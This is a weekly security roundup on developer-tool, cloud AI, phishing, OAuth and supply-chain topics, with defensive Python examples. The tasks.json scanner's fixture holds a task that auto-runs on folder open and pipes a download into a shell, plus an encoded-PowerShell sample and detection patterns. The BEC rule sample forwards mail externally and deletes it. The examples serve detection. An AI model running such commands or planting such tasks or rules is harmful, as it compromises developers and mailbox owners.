Weekly Security Roundup: AI Posture, Supply Chain, and Data Control

This week's updates cover risks in developer environments, AI and cloud posture management, vulnerability triage, and new controls for workload and supply chain protection. Data governance remains a recurring theme.

Security in Developer Tooling and Workflows

An analysis covers the risk posed by VS Code's tasks.json: the file defines shell commands that run on the developer's machine, so a task checked into a shared repository can execute attacker-controlled commands on any engineer who clones the repository and runs it. Developers are encouraged to open untrusted repositories in isolated dev containers, review checked-in automation files (.vscode/tasks.json and similar) before running anything, and ask for stronger platform-level controls.
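The check a practitioner would want here is a pre-open scan of a cloned repository for task definitions that auto-run or that carry shapes no build task should have. The Python below is an added example, not code from the analysis or from VS Code. It assumes the VS Code `runOptions.runOn: "folderOpen"` setting (which makes a task start when the folder is opened), a constructed sample tasks.json, and a hand-picked list of suspicious command patterns that a team would extend to its own environment.

```python
import json
import re
from pathlib import Path

# Constructed sample of a .vscode/tasks.json as it might arrive in a cloned
# repository; not taken from any real project. Written as strict JSON so
# json.loads accepts it (real files may be JSONC with comments and trailing
# commas, which needs a tolerant parser).
SAMPLE_TASKS_JSON = """
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build"
    },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" }
    },
    {
      "label": "bootstrap",
      "type": "process",
      "command": "powershell",
      "args": ["-EncodedCommand", "ZQBjAGgAbwAgAGgAaQA="]
    }
  ]
}
"""

# Command shapes a reviewer would not expect in a build task (assumed list;
# extend with whatever is unusual for your own repositories).
SUSPICIOUS = [
    (re.compile(r"(curl|wget)\b.*\|\s*(ba|z|)sh\b"), "pipes a download into a shell"),
    (re.compile(r"base64\s+(-d|--decode)\b"), "decodes base64 at run time"),
    (re.compile(r"(?i)-(enc|encodedcommand)\b"), "runs an encoded PowerShell command"),
    (re.compile(r"\$\{env:"), "reads environment variables into a command"),
]


def _command_line(task):
    """Flatten command + args (plain strings or {"value": ...} objects) into one string."""
    cmd = task.get("command", "")
    if isinstance(cmd, dict):
        cmd = cmd.get("value", "")
    parts = [str(cmd)]
    for arg in task.get("args", []):
        parts.append(arg.get("value", "") if isinstance(arg, dict) else str(arg))
    return " ".join(parts)


def scan_tasks(text):
    """Return a list of (task label, reason) findings for one tasks.json document."""
    doc = json.loads(text)
    findings = []
    for task in doc.get("tasks", []):
        label = task.get("label", "<unnamed>")
        # Auto-run on folder open means cloning and opening the repo is enough.
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            findings.append((label, "runs automatically when the folder is opened"))
        line = _command_line(task)
        for pattern, reason in SUSPICIOUS:
            if pattern.search(line):
                findings.append((label, reason))
    return findings


def scan_repo(root):
    """Scan every .vscode/tasks.json under root and return {relative path: findings}
    for files that raised at least one finding. Unparseable files are flagged too,
    since a file the scanner cannot read is exactly the one to inspect by hand."""
    results = {}
    for path in Path(root).rglob("tasks.json"):
        if path.parent.name != ".vscode":
            continue
        try:
            findings = scan_tasks(path.read_text(encoding="utf-8"))
        except json.JSONDecodeError as exc:
            findings = [("<file>", f"unparseable JSON ({exc.msg}); inspect by hand")]
        if findings:
            results[str(path.relative_to(root))] = findings
    return results


if __name__ == "__main__":
    for label, reason in scan_tasks(SAMPLE_TASKS_JSON):
        print(f"{label}: {reason}")
```

Run `scan_repo(".")` from the root of a freshly cloned repository before opening it in the editor; anything it reports should be read in full, and a `folderOpen` task in a repository you did not write is a reason to open it only inside a dev container.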

Cloud AI Security and Copilot Studio Protections

Microsoft Defender now offers unified management of AI risk across cloud environments (Azure, AWS and GCP), mapping agent privileges and checking for prompt injection. Microsoft Copilot Studio's runtime protection now includes automated webhook review to identify and stop unintended agent actions. These features build on last week's coverage of agent security.

Microsoft Fabric and OneLake: Fine-Grained Security Management

Fabric now offers REST APIs for OneLake that automate path-based access controls. The APIs integrate with Entra ID for fine-grained permission management that can be driven from CI/CD. OneLake security for mirrored databases adds detailed controls that reduce the risk of over-permissioning and data duplication.

Threat Intelligence: Phishing Campaigns and BEC Countermeasures

Microsoft investigates new phishing and BEC attacks targeting the energy sector, including multi-stage campaigns that host lures on SharePoint to get past mail filters and steal user sessions. Once inside a mailbox, attackers add inbox rules to keep access and to delete the evidence of their activity. The report covers detection, recovery, and analytics alongside remediation strategies, reinforcing best practices for defense.
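The inbox-rule persistence step is the one defenders can hunt for directly. The Python below is an added example, not code from Microsoft's report: it scores a mailbox's rules for the combination of external forwarding, deletion, hiding and keyword matching that characterises BEC persistence. The sample rules are constructed, shaped like the objects returned by the Microsoft Graph messageRules endpoint (an assumption for illustration; in that API `moveToFolder` is a folder id that you would first resolve to a name), and the tenant's own domain list and keyword list are assumptions to replace with your own.

```python
# Constructed sample rules in the shape of Graph messageRule objects; not real data.
SAMPLE_RULES = [
    {"displayName": "Invoices to folder", "isEnabled": True,
     "conditions": {"subjectContains": ["invoice"]},
     "actions": {"moveToFolder": "Invoices", "stopProcessingRules": False}},
    {"displayName": ".", "isEnabled": True,
     "conditions": {"bodyContains": ["password", "wire", "payment"]},
     "actions": {"forwardTo": [{"emailAddress": {"address": "collector@mail.invalid"}}],
                 "delete": True, "markAsRead": True}},
    {"displayName": "Cleanup", "isEnabled": True,
     "conditions": {"senderContains": ["security@"]},
     "actions": {"moveToFolder": "RSS Subscriptions", "markAsRead": True}},
]

INTERNAL_DOMAINS = {"contoso.invalid"}  # assumption: the tenant's own mail domains
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "junk email", "deleted items",
                  "conversation history", "archive"}
KEYWORDS = {"password", "wire", "payment", "invoice", "bank", "urgent"}


def _addresses(recipients):
    return [r.get("emailAddress", {}).get("address", "").lower() for r in recipients or []]


def score_rule(rule, internal_domains=INTERNAL_DOMAINS):
    """Return (score, reasons) for one inbox rule; each independent indicator adds one.
    Disabled rules score zero but are still worth listing during incident review."""
    reasons = []
    if not rule.get("isEnabled", True):
        return 0, reasons
    actions = rule.get("actions", {})
    conditions = rule.get("conditions", {})
    name = rule.get("displayName", "")

    # Forwarding or redirecting outside the tenant is the classic BEC exfiltration step.
    for key in ("forwardTo", "forwardAsAttachmentTo", "redirectTo"):
        for addr in _addresses(actions.get(key)):
            if addr.rsplit("@", 1)[-1] not in internal_domains:
                reasons.append(f"{key} to external address {addr}")

    # Deleting, burying or pre-reading matching mail hides the attacker's traffic.
    if actions.get("delete") or actions.get("permanentDelete"):
        reasons.append("deletes matching mail")
    if str(actions.get("moveToFolder", "")).lower() in HIDING_FOLDERS:
        reasons.append(f"moves mail to rarely-read folder {actions['moveToFolder']!r}")
    if actions.get("markAsRead"):
        reasons.append("marks mail as read")

    # Conditions keyed on finance or credential words point at the payment theme.
    words = {w.lower() for k in ("subjectContains", "bodyContains") for w in conditions.get(k, [])}
    if words & KEYWORDS:
        reasons.append("matches keywords " + ", ".join(sorted(words & KEYWORDS)))

    # Attackers often name rules with a single dot or space so they look empty.
    if not name.strip(". ,;-_") or len(name) <= 2:
        reasons.append(f"near-empty rule name {name!r}")
    return len(reasons), reasons


def find_suspicious_rules(rules, threshold=2):
    """Return [(name, score, reasons)] for rules at or above the threshold, worst first."""
    scored = []
    for rule in rules:
        score, reasons = score_rule(rule)
        if score >= threshold:
            scored.append((rule.get("displayName", ""), score, reasons))
    return sorted(scored, key=lambda item: -item[1])


if __name__ == "__main__":
    for name, score, reasons in find_suspicious_rules(SAMPLE_RULES):
        print(f"[{score}] {name!r}: " + "; ".join(reasons))
```

The threshold matters: a single keyword match is how ordinary users file their invoices, so one indicator alone should not page anyone, while external forwarding plus deletion is rarely legitimate and should be treated as confirmed compromise until the user says otherwise.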

Automating Vulnerability Detection and Management

GitHub Security Lab's Taskflow Agent uses LLMs guided by rule books to automate vulnerability triage for GitHub Actions and JavaScript, filter out false positives, and feed results into GitHub Issues. Modular YAML and prompt/task templates make it extensible, helping teams review reports systematically and reduce manual work.

Secure Auth and Delegated Access Patterns in Cloud Services

A new guide explains how to use Microsoft Entra's OAuth2 On-Behalf-Of flow in Python MCP servers built with the FastMCP SDK, so that the server calls downstream APIs as the signed-in user with delegated, auditable permissions rather than with its own standing credentials. Code samples and setup details show how to integrate these user flows with existing cloud services.
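The part of the flow that is easy to get wrong is what the MCP server must check before it trades the user's token for a downstream one. The Python below is an added example and is not the guide's or FastMCP's code; it writes out the two halves of the exchange (claim checks on the inbound user token, then the OBO request body against the Entra v2.0 token endpoint) with the HTTP call injected so it runs offline. In a real server the signature check would be done first by a JWT library against the tenant's JWKS, and the exchange itself is what MSAL's `acquire_token_on_behalf_of` performs; the claim values and identifiers in the test are constructed.

```python
import time

# Grant type and token-use marker defined for the Entra OBO flow.
OBO_GRANT = "urn:ietf:params:oauth:grant-type:jwt-bearer"


def token_endpoint(tenant_id):
    return f"https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token"


def check_inbound_token(claims, expected_audience, tenant_id, required_scope=None, now=None):
    """Validate the claims of the user token the MCP server received. Returns a list of
    problems (empty means acceptable). Assumes the signature was already verified."""
    now = time.time() if now is None else now
    problems = []
    # A token minted for some other API must never be replayed as our OBO assertion.
    if claims.get("aud") != expected_audience:
        problems.append("audience is not this MCP server")
    valid_issuers = (f"https://login.microsoftonline.com/{tenant_id}/v2.0",
                     f"https://sts.windows.net/{tenant_id}/")
    if claims.get("iss") not in valid_issuers:
        problems.append("issuer is not the expected tenant")
    if claims.get("exp", 0) <= now:
        problems.append("token expired")
    if claims.get("nbf", 0) > now:
        problems.append("token not yet valid")
    # The user must have consented to the scope that lets this server act for them.
    if required_scope and required_scope not in claims.get("scp", "").split():
        problems.append(f"missing delegated scope {required_scope}")
    return problems


def obo_request_body(client_id, client_secret, user_assertion, scopes):
    """Form fields for the OBO exchange: the inbound user token becomes the assertion."""
    return {
        "grant_type": OBO_GRANT,
        "client_id": client_id,
        "client_secret": client_secret,
        "assertion": user_assertion,
        "scope": " ".join(scopes),
        "requested_token_use": "on_behalf_of",
    }


def exchange_on_behalf_of(post, tenant_id, client_id, client_secret, claims, user_assertion,
                          expected_audience, scopes, required_scope=None, now=None):
    """Check the inbound token, then exchange it for a downstream access token.
    `post(url, data)` is injected (e.g. requests.post(...).json()) so this runs offline."""
    problems = check_inbound_token(claims, expected_audience, tenant_id, required_scope, now)
    if problems:
        raise PermissionError("; ".join(problems))
    response = post(token_endpoint(tenant_id),
                    obo_request_body(client_id, client_secret, user_assertion, scopes))
    if "access_token" not in response:
        # Entra reports consent or policy failures here (e.g. interaction_required).
        raise RuntimeError(response.get("error_description") or response.get("error") or "no token")
    return response["access_token"]
```

The downstream token obtained this way carries the user's identity, so calls made with it show up in the downstream service's audit trail as the user acting through the MCP server, which is the property the guide is after; a server that skipped the audience check would accept any token issued in the tenant and turn into a generic token-laundering endpoint.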

Enhancing Supply Chain Security: Container Image Signing

Guides covering the CNCF Notary Project tooling together with Microsoft's Artifact Signing (now GA) describe managed certificate handling for CI/CD and AKS, making it simpler to sign images, handle credentials, and apply RBAC. The guides also support migration from older image signing strategies.

Broader Identity and Data Security Guidance

A framework for 2026 outlines four priorities for identity and network access risk management: adaptive policies, governing users/agents, Zero Trust adoption, and credential controls. Platform integration (Defender, Purview, Verified ID) is central for compliance. Azure Essentials video content shows Purview’s main governance and audit features, complementing ongoing security automation content.

Other Security News

CodeQL release 2.23.9 announces that support for Kotlin 1.6 and 1.7 will be deprecated in February 2026; users of these versions should upgrade. Guidance is available for GitHub Enterprise Server and the CodeQL CLI, following last week's security tooling updates.